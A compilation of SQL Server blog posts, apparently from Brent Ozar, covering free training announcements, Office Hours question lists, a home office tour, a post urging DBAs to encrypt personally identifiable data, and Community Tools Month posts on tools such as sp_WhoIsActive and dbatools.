Erik Darling’s Month of Free Tools Training

Over the past month (plus or minus a couple days), Erik Darling churned out dozens of posts to show how he uses different SQL Server Community Tools that are free and open source to troubleshoot SQL Server issues. You should read all of them. I did. (I also shamelessly copy/pasted this intro, plus the below, directly from his blog.)

Here’s the full list of posts:

I don’t know anybody who works harder at giving you free SQL Server training than Erik does. (That part I didn’t copy/paste from his blog.)


October is Free Fundamentals Month – And The Training Starts Now.

Indexing
18 Comments

Every weekday during the month of October, one of the modules from my Fundamentals classes will be absolutely free to watch. But you gotta watch it that day – you snooze, you lose.

This week is Fundamentals of Index Tuning. To follow along with the labs this week & next week, you’ll need SQL Server 2017 or newer, with the most recent Cumulative Update, the most recent SQL Server Management Studio, and the 50GB Stack Overflow 2013 database (10GB 7z file, extracts with 7-zip.) You don’t have to follow along with the labs, but I highly encourage it.

Make sure to keep up – next week, we’ve got Fundamentals of Query Tuning coming fast & furious.

These are recordings of live classes. In the live class, the questions & chat take place over Slack. You don’t need to join the Slack – I only monitor that chat room during the live classes. (I’m on vacation in New York at the moment, heh.)

Eagle-eyed readers will note that this isn’t all of the modules from each class, nor is it all of my Fundamentals classes. That’s because this whole thing is a diabolical mind trick, dear reader. I aim to get you hooked on the quality of my online training, and then come November 1st, when my annual Black Friday sale starts, you’ll be ready to get out your wallet – or your boss’s wallet – to get a Recorded Class Season Pass: Fundamentals, or Mastering, or the Level 2 Bundle when they go on sale.


[Video] Office Hours: Ask Me Anything at the Mediterranean Sea

Videos
0

On the last day of my Israel trip, I went through the highly upvoted questions from https://pollgab.com/room/brento and answered ’em, standing in front of the beach.

Here’s what we covered:

  • 00:00 Start
  • 00:37 AllThePartyPeople: On our server, MAXDOP=1 (not my choice); we had a poor performing SP call (called as dynamic SQL; again not my choice); Ran in SSMS; ran fine. Cleared plans & tried; Failed web; SSMS worked. Set MAXDOP=4, and both work fine. What are we missing? Why did it always work in SSMS
  • 02:09 FrankieG: Hi Brent, How do I sell the sp_Blitz scripts and, for that matter other advice you and other similar experts, have imparted that I have come to rely on, to the “owners” of the MSSQL client databases at a company where I’m the new guy?
  • 03:05 APB: Hi Brent, Just curious about your thoughts on creating a view in a data warehouse with an index (schemabinding + unique clustered index) versus creating a similar table and truncating and reloading after a nightly data refresh. Which is most efficient?
  • 05:01 Medazzaland : What criteria do you use to decide if a given long running transaction is a concern or not? 06:14 Medazzaland: What are the best training resources for learning SQL Availability Groups?
  • 06:54 PB&J: Hi brant, I’m a big fan of transactions and error handling in stored procedures. Developers say they implement try/catch and transactions in the application code so they don’t want to add it on the SP as well. Is it indeed duplicate or handling errors in SQL has its benefits? Tnx
  • 08:00 Ramil: Hi Brent! App controls a lot of things like amount of database files – only one, indexes can be created only via app, partitioning is not allowed. How can I scale up horizontally in this case? because DB is growing 300gb per month. OLTP DB, currently 1.8 TB, in AlwaysOn AG.
  • 10:05 bamdba: Hi Brent, I’ve inherited a SQL estate where I have multiple SQL HADR (2012 to 2017) on a single OS and with data files on mount points. Any suggestions on how can I consolidate these servers without migrating to new ones?
  • 11:43 Mehmet: Do untrusted foreign keys adversely affect query plans?
  • 12:03 Mehmet: Have you ever experienced an ailing SQL Server that sent out so many failure simultaneous notifications that it took down the mail server?
  • 12:49 Timbalero: Hi Brent, apart from inaccurate stats, UDFs and table variables, what other reasons can make the CE produce estimates of exactly 1 row? Can multiple joins have something to do with it?
  • 14:56 Ingibjorg: Do you have any recommended guidance for creating / optimizing new VM configuration for SQL Server 2019 Standard in an Azure VM? Is it any different than bare metal new server configuration?

Vegas Home Office Tour

Home Office
17 Comments

I’ve been teaching online from home for years, and you’d probably think my office would keep growing and growing – but actually, my setup has gotten a lot smaller since the last time I blogged about it. I don’t really need space in order to work, and I kinda wanna incentivize myself to get out of the office when my work is done.

I designed my Vegas home office around the side camera view that the audience sees while we’re doing live Q&A and chatting in Slack (the window at the top right of the stream):

I wanted a lively view with a bunch of personal stuff in the background (although blurred a little with good bokeh.) Here’s how it looks behind the scenes – the entire wall to the left is painted chroma key green so I can do greenscreen work:

And here’s the camera I’m staring at when the side view is on:

When I turn back to the computer to continue presenting, here’s what the setup looks like:

Desk: Vari Standing Desk – I went for the smallest stable standing desk I could find. It’s got just enough room for my monitor, laptop, keyboard, trackpad, and Stream Deck, but no more than that. It’s quite the departure from my giant NextDesk Terra Pro, which is down in the garage now.

Chair: Vari Active Seat – I’ve used an Aeron on wheels for years, but I wanted something that was more of a bar stool height. I was really curious about the Active Seat because it doesn’t have wheels, and instead lets you naturally move around in a small area. I thought for sure I’d fall over – but it’s been great! I love it, and I can sit on it for hours.

Laptop: MacBook Pro 16 – I’m on the 2021 model with the M1 Max processor and 64GB RAM. The Apple Silicon processor is everything you’ve read about in reviews: crazy fast and completely silent, even when I’m streaming and recording videos. The ARM processor can’t run SQL Server in Windows VMs, so I use the cloud for that instead.

Monitor: Gigabyte M34WQ 34″ (RTings) – Around $500 for 3440×1440 resolution and a 144Hz refresh rate. I like the way Apple’s Pro Display XDR looks, but I’m not about to spend 10X more in order to see colors more vividly when I’m partially colorblind anyway.

Control panels: Elgato Stream Deck XL – A vital, vital part of my streaming workflow with keys to trigger all kinds of stuff that I use while streaming. I use two of these, one on the right side of my desk and one on the left, because regardless of what I’m doing and where I’m standing, I wanna be able to trigger events.

Elgato Stream Deck

Slack chat display: Apple iPad – In my classes, the audience can ask questions and chat with each other via Slack. I need to be able to see that chat at all times so I can respond immediately to questions or feedback. When I’m doing PowerPoint presentations full screen, I need one clean monitor with the PowerPoint display that the audience will see, and the other display is PowerPoint presenter view. I could have added another monitor to my desktop, but I just didn’t wanna take up much space, and an iPad is perfect for this.

Green screen camera: Sony ZV1 – This is actually a big step down from my previous streaming setups. When I’m doing green screen work, my image is a small part of the entire screen, so I don’t need a really good camera here. I just need something better than the typical USB webcam, because those don’t pick up enough color details for green screen work. The ZV1’s small sensor is good enough. I use the HDMI output, and plug that into an Elgato Cam Link 4K. I have a Rode VideoMic Go on the top of this camera as an emergency microphone in case my wireless headset goes out during a class. The mic is always on, so if my regular mic dies, I can just unmute the ZV1’s audio in OBS, and we can keep right on going.

Side camera: Sony ZV-E10 with Sigma 16mm lens: While I don’t need a high quality green screen camera, the side view camera has to be lusciously detailed. When I switch to the side camera, I’m having a discussion with the audience, and I take up the whole screen. I want the background to be defocused. This camera’s HDMI output also gets plugged into an Elgato Cam Link 4K. If you need to plug multiple Cam Links into a laptop, I don’t recommend routing them through a dock – instead, get a simple USB 3.1 hub. Otherwise, when I run too much through a dock, the Cam Links end up dropping offline.

Microphone: DPA headset microphone plugged into a Sennheiser AVX transmitter, into a Focusrite Scarlett – This setup is total overkill, but I really like the flexibility of being able to move around a lot while I do green screen work, and not have to worry about tripping over cables.

Lighting: a hodgepodge. A pair of Neewer 12.9″ lights for the desk, and a couple of older Neewer lights to light the green screen. I really wanted to use Elgato Key Lights so that I could automatically turn them off & on when I changed camera scenes and put the stream on break. However the Key Light’s WiFi connections were wildly unreliable for me. The Neewer lights are actually mounted to Elgato Key Light stands because those are nice hardware, but the Key Lights themselves are sitting in the closet, unused.

Streaming software: OBS. I’ve written about how I use OBS for streaming and training classes, and how to make online streams fun and interactive with OBS scenes. For video delivery, I use Mux for private classes, Twitch for public streams, and YouTube for public stream replays.

If you’ve got questions about my office setup, feel free to ask away in the comments!


Free Live Webcast: Why is One Query Sometimes Slow and Sometimes Fast?

SQL Server
2 Comments

Sometimes the exact same query goes slow out of nowhere. Your current fix is to update statistics, rebuild indexes, or restart the SQL Server. It works, but you don’t know why.

The single most common reason is parameter sniffing. SQL Server “sniffs” the first set of parameters for a query, builds an execution plan for it, and then reuses that same plan no matter what parameters get called. It’s been the bane of our performance tuning for decades.

In this one-hour session on Thursday, October 20th, I will explain:

  • How it happens
  • How SQL Server 2022 is trying to fix it
  • How you can work around emergencies in the meantime

Thanks to the session’s sponsor, Pure Storage, the first 200 folks to register and attend the entire webinar will get a $10 gift card for lunch. Get your lunch and learn on for free.


Buckle Up: October is Free Fundamentals Month!

Company News
40 Comments

Recorded Class Season PassHow about some completely free SQL Server training?

Every weekday during the month of October, one of the modules from my Fundamentals classes will be absolutely free to watch. But you gotta watch it that day – you snooze, you lose.

To prep, block out a 30-minute window on your calendar, right now. Put a label on it, and bookmark this page. Each day, come back to this page, click on the day’s module, and get your learn on. Here’s what you’ll learn:

Fundamentals of Index Tuning

To follow along with the labs this week & next week, you’ll need SQL Server 2017 or newer, with the most recent Cumulative Update, the most recent SQL Server Management Studio, and the 50GB Stack Overflow 2013 database (10GB 7z file, extracts with 7-zip.) You don’t have to follow along with the labs, but I highly encourage it.

Fundamentals of Query Tuning

Fundamentals of Columnstore

For this class, you don’t have hands-on labs, and you’re not meant to follow along with the demos. Columnstore is about bigger data, so I use the 2018-06 ~180GB copy of Stack Overflow (info page.) You definitely don’t need to grab that, but I’m mentioning it here in case you want to follow along with the demos.

Fundamentals of TempDB

For this class, you don’t have hands-on labs, but if you want to follow along with the demos, I’ll be using the same 50GB Stack Overflow 2013 database we used during the first two weeks.

Eagle-eyed readers will note that this isn’t all of the modules from each class, nor is it all of my Fundamentals classes. That’s because this whole thing is a diabolical mind trick, dear reader. I aim to get you hooked on the quality of my online training, and then come November 1st, when my annual Black Friday sale starts, you’ll be ready to get out your wallet – or your boss’s wallet – to get a Recorded Class Season Pass: Fundamentals, or Mastering, or the Level 2 Bundle when they go on sale.

These are recordings of live classes. In the live class, the questions & chat take place over Slack. You don’t need to join the Slack – I only monitor that chat room during the live classes. (I’m on vacation in New York at the moment, heh.)

Now go block out a recurring 30-minute window in your calendar every weekday in October. See you in class!


[Video] Office Hours: Six-Minute Speed Round

Videos
1 Comment

The morning after the Data TLV Summit in Tel Aviv, I stood out on the balcony and answered a few of your questions from https://pollgab.com/room/brento, rapid-fire style:

 

Here’s what we covered:

  • 00:00 Intros
  • 00:47 cyrpl: Hi Brent from PEI, Canada. A support person told me today that when creating a table, an ID column should almost be a default for every table. Do you agree? 98% of our tables do not have ID fields. Would adding ID fields to busy tables generally help query performance?
  • 01:15 Nas: What is quickest and short downtime way of migrating 7TB database on new storage old SAN (DELL) new SAN(HPE)?
  • 02:19 Simon Frazer: Have you come across scenarios where you feel SQL Server would’ve benefited from allowing more than 1 8k page for statistics?
  • 02:38 Ingibjorg: Do Postgres DBAs tend to have higher pay ceilings than MSQL DBAs?
  • 03:12 Ingibjorg: What tools / tests do you like to use when performance testing the network layer for a new SQL server?
  • 03:32 sp_blitz_says_myboss_is_a_rocket_scientist: in what cases should we create statistics ourselves?
  • 04:33 Does Basically Anything: Hi Brent! How would you recommend tuning when faced with a cursor query that has so many iterations that you can’t pull an actual execution plan when running it because it overwhelms SSMS?
  • 05:06 Ingibjorg: Management uses KPI’s to judge the developers. Management also wants KPI’s to evaluate the SQL production DBA. In addition to meeting RPO/RTO objectives, what are good / bad KPI’s for this? Tickets closed, peer review scores, etc?
  • 05:47 Mehmet: At what point should you ask dev to introduce app layer caching for a query that is rapidly re-executed?

[Video] Office Hours in Tel Aviv, Israel

Videos
2 Comments

Before speaking at the Data TLV Summit, I sat by the Mediterranean Sea and discussed the top-voted questions you posted at https://pollgab.com/room/brento.

Here’s what we covered:

  • 00:00 Start
  • 00:55 Manikandan GS: As postgres being one among the RDBMS lane, do you think postgres is having more features and flexibility compared to MS-SQL Server?
  • 02:46 PaginationWoo!: Hi Brent. I use Ola’s script to update stats nightly. Other than time spent and % CPU used, is there a case where updating stats with fullscan would be a bad thing? I’m fortunate in that I have a long maintenance window. If I have time for fullscans, wouldn’t it be worth doing?
  • 04:42 Adza: I had the thought of creating a date table with all dates ranging from 2010 to 2070 and have a smallint key for each date. Then in my tables I can store smallint values instead of actual dates. This could be a huge data saver (2 bytes vs 3 bytes). Smart or stupid? 05:53 Eyes Without a Face: Is there a portable version of the First Responder Kit? Our customers are mainly banks and they are not keen to install Stored Procedure. Not even the First Responder Kit
  • 06:44 Dawson from Dawsons Creek: Do you have any clue why Microsoft suggests to use a windows collation for new development work but the default server collation for English(US) is still a SQL collation? For all other Windows locale the default server collation is a windows collation.
  • 08:07 StillLearning: Hello Brent, as a Dev DBA I’ve recently became increasingly frustrated with computed columns and their limitations (filtered index…). Should I advise the dev teams to refrain from using them and do the computation in the app instead ? Thanks
  • 09:26 Haurun: What are the pros/cons of installing Ola Hallengren maintenance script tables / sp’s in master database vs some kind of maintenance db?
  • 10:42 Milind: Hi Brent, Thanks for your time. During execution of certain queries or SPs I am observing high logical reads. Where should I look to make sure it is appropriate or required improvement? Unfortunately, I haven’t completed all the training modules and asking this question.
  • 12:06 TheCuriousOne: Hi Brent! If you have to work with local SSDs in a server for your SQL setup, is it better to have one big array with OS side logical separation through partitioning or to have physical separation by setting up smaller disk-sets with various RAID configurations?

New Online Class: Running SQL Server in AWS and Azure

Cloud Computing
6 Comments

You’re used to managing your own SQL Servers in VMs, but now they’re asking you to work with the cloud.

You’re already comfortable installing, backing up, and performance tuning “regular” SQL Servers, and you just need to catch up with what’s different about the cloud.

You don’t want hype – you just want honest opinions from someone who doesn’t work for a cloud vendor.

In this recorded class, you’ll learn:

  • How to assess your current workloads
  • How to pick the right VM type for your workload
  • How to size storage for performance, not size
  • How to assess wait stats in cloud VMs
  • How to back up directly to cloud-native file systems
  • Where Azure Managed Instances & AWS RDS make sense

I’m Brent Ozar, and I’ve been managing client VMs in the cloud for over a decade. I’ll get you up to speed with unbiased facts, not hype, and save you valuable time as your career transitions to the next level.

To get started saving your company time and money, get the course for $195. Folks with a Recorded Class Season Pass: Fundamentals or a Level 2 Bundle can start watching the class right now under their account. Enjoy!


Office Hours: Gif Reactions Edition

Some of the questions y’all post at https://pollgab.com/room/brento are open-and-shut cases. I was going to do a one-word-answers edition, but I think this is even better: gifs.

GI Joe DBA: Thoughts about IT professionals Unionizing? IT professionals are in demand. Because of our demand, should we use this leverage to unionize, raise the bar, force better health benefits, retirement benefits, etc for ALL.. US Citizens? Ever discuss this with colleagues?

Rudy: Love the statistics parser web site. Will it remain around for the foreseeable feature? If not, is the source code freely available? 

Will Marshall: What are the common mistakes to avoid when coding sprocs that will crash SSMS during execution / debugging?

DBA_Mufasa: Salut Brent! Does using filegroups really help distribute I/O throughput and minimize disk contention if the ndf files for those filegroups still reside on the same logical volume?

Justsin: Do you ever like to use “SET STATISITCS XML ON” for troubleshooting stored procedures?

40 oz Coffee Breakfast: Do you have any experience with using DDBoost as a backup solution? My friend is currently using Ola’s scripts to backup to a Data Domain as a CIFs share. Storage team asks for us to use DDBoost but there is a concern about losing granularity of restores.

Dan: Any insight into why DB restores are unbelievable painful within Azure SQL, we seem to be averaging between 20-80 minutes with < 50% success on a less than 200mb db and results are still mixed regardless of if we do point in time or full restores.

Sql Padawan: Hi Brent! I’ve really enjoyed your Mastering courses. Especially the stories and analogies you use (like the one about pets wearing disguises). What do you recommend to create a successful online course? (btw, I’m not planning to create SQL Server courses 😀 )

Menahem: Does high plan cache turn over due to improper query parameterization adversely affect commercial SQL monitoring software?

Bart: Hi Brent. What’s the best way to convert UTC datatime to local datetime/date. I’ve been using this: CONVERT(DATETIME, SWITCHOFFSET(CONVERT(DATETIMEOFFSET, mydate.MODIFIEDDATETIME), DATENAME(TZOFFSET, SYSDATETIMEOFFSET()))) AS LOCALDATETIME

Will Marshall: What are the pros/cons of letting SQL create the temp table via SELECT INTO (i.e. SELECT into #MyTempTable) vs explicitly creating the temp table then inserting into it?

YouGottaDoWhatYouGottaDo: Hi Brent, do you know of a list of former “Best Practices” for SQL Server that have now become useless or even dangerous/harmful (due to engine/OS evolution)?

Menahem: Do any of your clients run their primary AG / HA SQL2019 node on prem and their secondary 2019 AG / HA node in Azure? Is this a bad idea?

And I’ll leave you with a bonus gif:


Most DBAs Say They’re Encrypting Personally Identifiable Data. Most.

Despite the continuous stream of data breaches, ransomware, and GDPR violations, some companies still aren’t encrypting personally identifiable information (PII) inside our databases or backups.

I see this all the time when working with clients, but I can’t exactly talk about that or give numbers, so I decided to take a highly unscientific poll on Twitter. I figure if DBAs are sitting around on social media, they’re probably done with all the important parts of their job. The 147 votes came in:

Hoping for more upbeat news, I also asked on LinkedIn, a more professional social media network, where maybe people do their jobs better? I’m just guessing, who knows:

The story was better, but it’s still sketchy. Depending on where you ask, one in five to one in three shops isn’t encrypting their personally identifiable information at all.

I actually have a hunch the number is much worse because in a social media poll, we’re just taking folks at their word. In reality, when I’ve lifted the covers to dig a little deeper with the business, we’ve found things like production data being restored to development servers, and stored unencrypted.

When I’ve discussed this with clients, some folks even say, “Yes, we’re encrypting data – we use encryption at rest at the storage level. Everything that hits disk is encrypted automatically.” Okay, great – now what happens when someone takes a backup? They can copy that backup anywhere they please, like writing directly to someone else’s Azure Blob Storage account or to Amazon S3, and you won’t get any errors or warnings. Storage-level encryption doesn’t stop data exfiltration.

It’s okay if you don’t have all of the answers, but as a database administrator, you should start by asking a few questions:

  • Where are we storing personally identifiable information?
  • Is that data encrypted, and how?
  • If it’s not encrypted, what’s the plan to get it encrypted? Is the business waiting on me to do something?
  • Has anyone given my manager and the company’s security & compliance departments those above answers in writing?

Asking those questions is the first step to getting your company to a safer place.


[Video] Office Hours: Ask Me Anything About SQL Server and Azure

Videos
5 Comments

Got questions about the Microsoft data platform? Post ’em at https://pollgab.com/room/brento and upvote the ones you’d like to see me cover. Today’s episode finds me in my home office in Vegas:

  • 00:00 Intros
  • 02:10 GeorgeDAX: Hello Brent, I’m a dealing with a huge sales table which contains around 500 columns with 50m rows. Business asks to add even more columns in the table. Should I break the table or keep adding columns to the same one? Performance wise, what’s the best approach?
  • 04:47 Brynjar: Do you have a suggested max column limit when designing new tables that require fast queries?
  • 05:58 Manuel Labour: What is the largest stored proc you ever had to optimize? How long did you spend on it?
  • 07:24 Yavin: When analyzing SQL memory use, what are healthy / unhealthy utilization ratios for MEMORYCLERK_SQLBUFFERPOOL, CACHESTORE_SQLCP, MEMORYCLERK_SQLGENERAL?
  • 08:21 Eduardo: Is it safe to run sp_blitzindex on a busy OLTP server (3000+ batches per second) during peak business hours or should this be done after hours?
  • 10:22 3rdNormalForm: HEAPS & Vendor Packages. I have a 43 million row table called transactionxlog with no keys and no CX. sp_blitzcache shows 7 queries against this table with costs of 883. I took the recommend composite index and made it into a clustered index. [UNIQUIFIER] what is it?
  • 12:05 DB_Architect_Chick: Hi Brent. I’m designing a new database for 50k inserts/selects (minimal updates) per hour. I am doing my best to make mature design decisions, but with no actual data to test against, do you have any suggestions for establishing an effective initial index strategy?
  • 15:22 Eduardo: What is your opinion of Intel QAT backup compression in SQL 2022?
  • 17:34 Vilhelms: Is there a good way to know when a query caused an auto stats update and how long the auto stats update took?
  • 19:39 Pete S: What is your opinion\thoughts on the “SQL Graph Database” feature that was introduced in SQL Server 2017? Have you worked with any clients that use it in production OR is this another “copy-cat” feature to keep up with the database Jones’?
  • 20:57 RaduDBA: Mr. Brent, with all the cloud solutions and cloud databases that take over the data landscape, like datawarehouses, lakehouses etc. is there still room for SQL Server and traditional on-prem databases? I work as a DBA and do a lot of performance tuning. Is my career doomed?
  • 23:43 cyrpl: Brent, can you suggest a stored procedure source control tool. We have gitlab for code source control but we specifically want to track all changes to SQL Server stored procedures.
  • 25:56 YouGottaDoWhatYouGottaDo: Hi Brent! Have you ever encountered a very toxic work environment (dictator-boss, widespread discontent etc.) that created problems for you during your consulting work (even 1-day consultancy)? How did you handle this?

Community Tools Month: Using sp_WhoIsActive to Catch ASYNC_NETWORK_IO

Monitoring
10 Comments

When your SQL Server’s top wait stat is ASYNC_NETWORK_IO, that indicates SQL Server is waiting on the app to ask for the next part of the result set.

This is a real pain in the rear to troubleshoot because often these waits happen for really short duration each time – think milliseconds, not seconds. It’s an issue of death by a thousand cuts.

The easiest way to get a quick idea what’s happening is to use sp_WhoIsActive (Github – releases) repeatedly with no pauses in between:

Here, I’m running a workload with a lot of short queries running simultaneously. If I just run sp_whoisactive now and then, I don’t see any activity – only a query or two now and then, and they’re rarely waiting on network. However, if I run it several times in a row, right away:

Then I can get a fast, seat-of-the-pants idea of which queries are waiting on networking. I can also scroll across to the right in the result set and see which app it’s coming from, which servers, which logins, etc.

This isn’t an exact science by any means, but when I’m working with a client, it helps me quickly get a rough idea of what’s going on. It helps me start a conversation about the kinds of queries we’re running, how much data we’re bringing back (both in terms of rows and columns), and find out whether the app servers might be underpowered or swapping to disk.

Clients have said things like:

  • “Oh, we had no idea that app was bringing back all of the columns, and that’s problematic since we added a few XML/JSON/MAX columns in the table since that query was written.”
  • “Oh, we had no idea that application was taking so long to digest the results of those queries. We can give that app server more memory.”
  • “Oh, we had no idea that it was bad if we ran the database server in one data center, and the app servers elsewhere.”

ASYNC_NETWORK_IO isn’t necessarily a bottleneck for SQL Server – fixing the above problems may not make a big performance difference overall for other users – so solving it is often a relatively low value during the engagement. sp_whoisactive helps me dedicate the appropriately small amount of time & effort into the problem, and then move on to the bigger problems.


[Video] Office Hours: Hotel Balcony Edition, Part 2

Videos
0

Post your questions at https://pollgab.com/room/brento and upvote the ones you’d like to see me cover. In today’s episode, I sit down on a quiet hotel balcony and talk through a bunch of interesting questions:

Here’s what we covered:

  • 00:00 Introductions
  • 00:59 Haydar: What tools do you like to use when troubleshooting azure sql db query performance issues?
  • 01:57 The Midhight Idol: Does the glitz and glamour of Vegas ever wear off or get old?
  • 02:48 Haydar: Would a PostgreSQL version of constant care see the same demand and success?
  • 03:23 Walcott: Which Intelligent Query Processing features do you like or dislike in SQL Server 2019 and 2022?
  • 04:18 Delete_Rule:Cascade: Good day Brent! I’m new to data warehousing and I was wondering what your thoughts are on using SSIS for ETL operations? Are there similar products out there that are better or is SSIS the go-to product?
  • 05:08 Nikolajs: What is the largest number of tenants you have seen inside a single multi-tenant SQL server instance? Did this pose any unique challenges?
  • 07:00 Morty: What are your thoughts on new SQL 2022 ledger functionality and it’s use cases?
  • 09:27 MyFriendtheDBA: I’m getting excited about PASS Summit this November (my first). Being a Seattle-neophyte, any restaurant/food truck/personal kitchen recommendations for the trip?
  • 11:42 Nomad: My friend copied a database with Windows authentication using the “detach and attach” method. The .mdf and .ldf file permissions changed and reattaching the database failed. Why did the file permissions change and what steps would you take to resolve this issue?
  • 12:36 Madiha: What’s your opinion of the query plan viewer in Azure Data Studio?
  • 14:13 CronullaStingray: Hi Brent. I ran blitzindex and got “Indexaphobia: High Value Missing Index” which I created without modifications. It’s been over a month and the dm_db_index_physical_stats user_seeks and user_scans are both showing 0s. But blitzindex still says I need to create it. Why is that?
  • 15:33 Anatoli: How do you know if query store is a good / bad fit for your SQL server 2019 enterprise instance?
  • 16:30 Anatoli: What are the risks of long running native SQL backups?

[Video] Office Hours: Hotel Balcony Edition, Part 1

Videos
1 Comment

Post your questions at https://pollgab.com/room/brento and upvote the ones you’d like to see me cover. In today’s episode, I sit down on a quiet hotel balcony and talk through a bunch of interesting questions:

Here’s what we covered today:

  • 00:00 Introductions
  • 00:25 Kebros: Hi Brent.My manager wants me to summarize sql health into a number 1-100 for all 50 production Servers.This is idiotic but just for Banter, what health metric (Eg I/O) will you advise me to use and average out (even if it doesn’t paint a whole picture) so I can feed my family.
  • 02:08 SwissDBA: Hi Brent, I inherited a database of 2 TB with 355 data files. How would you check (and prove to the business) if the database has too many data files? Even the biggest file is just 55 GB big and I believe the DB could be faster with much less data files.
  • 04:32 Britney: What are the common strategies you see used for recovering from “Oops” queries?
  • 05:40 LifeExtinguisher: Can rcsi improve backup speed? Considering backup reads the whole db and saves in bak file, and reads are routed to tempdb for older values, not needing shared lock on resource that already is booked by some other exclusive lock
  • 06:33 Sussudio: What tools / techniques do you recommend for generating large sudo realistic synthetic data loads for performance testing in the lower SQL environments?
  • 08:27 Dilara: When are SQL Server questions better suited for stackoverflow.com vs dba.stackexchange.com? Which forum has less snark?
  • 09:25 Lieutenant Dan: What are the top 4 SQL conferences ranked in order?
  • 11:33 Fyodor: What is your opinion / experience with using client side profilers like C# MiniProfiler to monitor SQL query performance?
  • 13:14 Does Basically Anything: Hi Brent! Regarding sp_databaserestore. I was wondering if you knew of anyone who wrote something open source that utilizes it for automating testing restores from multiple servers, multiple databases. Any clickholes I could venture down before I start building something myself?
  • 14:28 happydba: do you have a video of the baby sea turtles yet?!? 😀
  • 15:14 Haydar: What are your preferred scripts / tools for monitoring Always On latency?

Community Tools Month: Choose Your Character

This month on the blog is Community Tools Month, and I’m going to be talking about some of the most useful and influential tools out there.

You can’t learn them all – *I* can’t learn them all – because there just aren’t enough hours in the day to do your work, keep your skills sharp, take care of yourself, and take care of the ones you love.

So this month, think about a couple of things:

  • Can I use this tool to get my existing tasks done faster?
  • Do I want to keep doing these tasks in my next job?
  • What tasks do I wanna do in my next job?
  • Can I learn this tool to help me get my next job?

With that in mind, here’s something I use all the time with clients when I’m asking how many staff they have to support a particular application:

There are certainly more data-related jobs – BI developer, architect, data scientist, data engineer, etc – but let’s start here.

I know there are gonna be readers who say, “I do all of those tasks.” Sure you do – but you don’t do them well, and if you think you do, you’re deceiving yourself about what “well” means for any of those columns. You’ll be in for a world of surprise when you go to interview for a senior position in any of those columns, because senior = specialist.

With that in mind, for each of those columns, today I’m going to list a tool that I think is important for your next job.

If you want your next job to be Production DBA,
you should be learning dbatools.

In your current position, you may not manage enough servers to justify it. You might be content doing your work one server at a time, with the SSMS GUI and T-SQL. However, the Production DBA role at small companies will continue to evolve over the next decade, and your skills need to be ready for your next job. You want bigger responsibilities, and that means accomplishing more tasks, more quickly.

Get these two books and read them in order:

You’ll learn how the open source dbatools module helps you manage more servers, in less time, while making less errors.

Like any new tool, it’s going to be slower going for you at first – probably even for months. But when it’s time to get your next job, the one managing more servers in more environments, you’re going to be able to use the exact same techniques that you’ve already been practicing at your smaller job.

If you want your next job to be a Development DBA,
you should be learning sp_HumanEvents.

I’m not telling you to learn Extended Events – you can, sure, but you don’t need to. Erik Darling’s sp_HumanEvents automates the data collection AND, here’s the important part, the analysis, for the most common long-term problems that performance tuners need to solve. I don’t use Extended Events myself directly, ever, but I use sp_HumanEvents all the time.

To understand how powerful and useful it is, start with Erik’s 10-minute video on using it to troubleshoot blocking, compiles, and recompiles.

Then, go get it and read the documentation.

If you want your next job to be developer,
you should be learning MiniProfiler.

When your team builds software-as-a-service (SaaS) applications, sooner or later, you’re going to run into a problem with server performance analysis. SQL Server has historically struggled with this, and it’s getting even worse in SQL Server 2022.

Because of these problems, you’re going to be a much more effective developer if you can implement the free open source MiniProfiler to track which parts of your application are having performance problems, and which queries are causing those problems.

I’m not saying you have to be the one who analyzes the data, reads the queries, and tunes them. However, as a developer, you are the one who’s going to have to implement the data-collecting solution. This need is even more important in the cloud where performance costs pile up every month, and the urgency to fix ’em becomes even higher.

All 3 of these have something in common.

They’re on GitHub.

GitHub itself isn’t a community tool, but in 2022, GitHub is the tool where community open source happens. I’m not saying you have to learn GitHub or use it for your own code – it can be a real pain in the keister. But if you learn the basics of how to clone a project locally and keep it up to date, you’ll likely be better off no matter what your future job entails.


Office Hours, Short Text Answers Edition

Not all of the questions y’all post at https://pollgab.com/room/brento require long, thought-out answers. Some are just one-line specials, like these:

F’legend: Hi Brent, in reply to a question talking about database restores for 1TB+ you also touched on scrubbing or synthetic data as a way to populate dev environments. Are there any resources/tools you would suggest for these approaches?

Read this and the comments on it.

On Another Beach Somewhere: I am using multiple instances of SQL on the same VM. Brent says that’s a bad idea… lets pretend I have a good reason. How does Min/Max Memory come into play? Can I set both instances to the same “Max” and let them compete for memory or do I need to allocate a portion to each?

Congratulations. You just discovered one of many reasons why I told you it was a bad idea. Just wait til you discover CPU contention.

Steph: Hello Brent, is there a reason why SQL Server doesn’t seem to have shortcuts to compute stats on columns with unique constraint ? Why scan all rows when the density is always 1/count(*) and histograms seem useless ? This confuses me. Thanks.

Because some queries will do range scans, as in, show me all IDs between 1000 and 2000. SQL Server needs to know how many IDs exist in that range – some IDs may have been deleted. The only way to find out is to read the data.

Darin Webber: Hello Brent!! I need to change a datatype of 2 columns on a very large table.What would be the best approach for his operation? Creating 2 new columns and copying the data and then dropping the old ones, or there is another better approach? Will dropping the columns cause downtime?

Read this.

Tayyip: Is there an ideal index usage stats age band for when it’s safe to make decisions re: dropping rarely used NC indexes?

For me, if an index hasn’t been used in 32 days, it needs to go.

Don’t Blame Anthony: What is your opinion of using Pure FlashBlade to speed up SQL backups and restores?

I haven’t used it myself.

Daniel: Can you please please break down steps and the process of consuming data from an API (JSON format) using SSIS and then uploading that consumed data into a SQL Server database? Thanks!

I don’t use SSIS.

Bad DBA Taylor: We built a devops repo to deploy SQL permissions for service accounts, but due to the high volume (15k/batches/s) the release pipeline gets deadlocked on a very simple CREATE USER statement causes a massive SCH_M lock chain. Our security cache is 12gb. Could this be the problem?

If you think it is, try to flush that cache first as part of your deployment scripts. (I have a feeling it isn’t, though.)

RoJo: I want to add AG offsite. Can I use 2016 on-site and 2017 or 2019 offsite?

I would not do that, no. Failover would be one-way – you couldn’t fail back.

TeeJay: We recently had to do an unplanned over-the-top SQL upgrade from 2014 to 2017 in our prod environment (yes, bad, I know). I now have a bunch of fires to put out. Are there any obvious first places to look for new performance problems (like the cardinality estimator was for 2014)?

Indeed there are! Check out my Mastering Server Tuning class.

Eyes up here, kid
I look like WHAT?

Tayyip: What are the pros/cons of working as the sole SQL DBA vs working on a team of SQL DBA’s?

You can learn more, more quickly, by working with others. You also have to put up with them.

Alex: Hi Brent, You look like someone that is in pretty good shape. How do you balance your Work, Health & Mind in what can be a sedentary job. Especially because of Covid alot of people are not having to go into the office any more?

Read this.

Seshat: What are your thoughts on using SQL startup option -E for index rebuild / read ahead performance across multiple data files?

Never heard of it.

Sekhmet: What is your experience / opinion of using NVDIMM / PMEM as a high speed storage for SQL Server?

It’s dying.

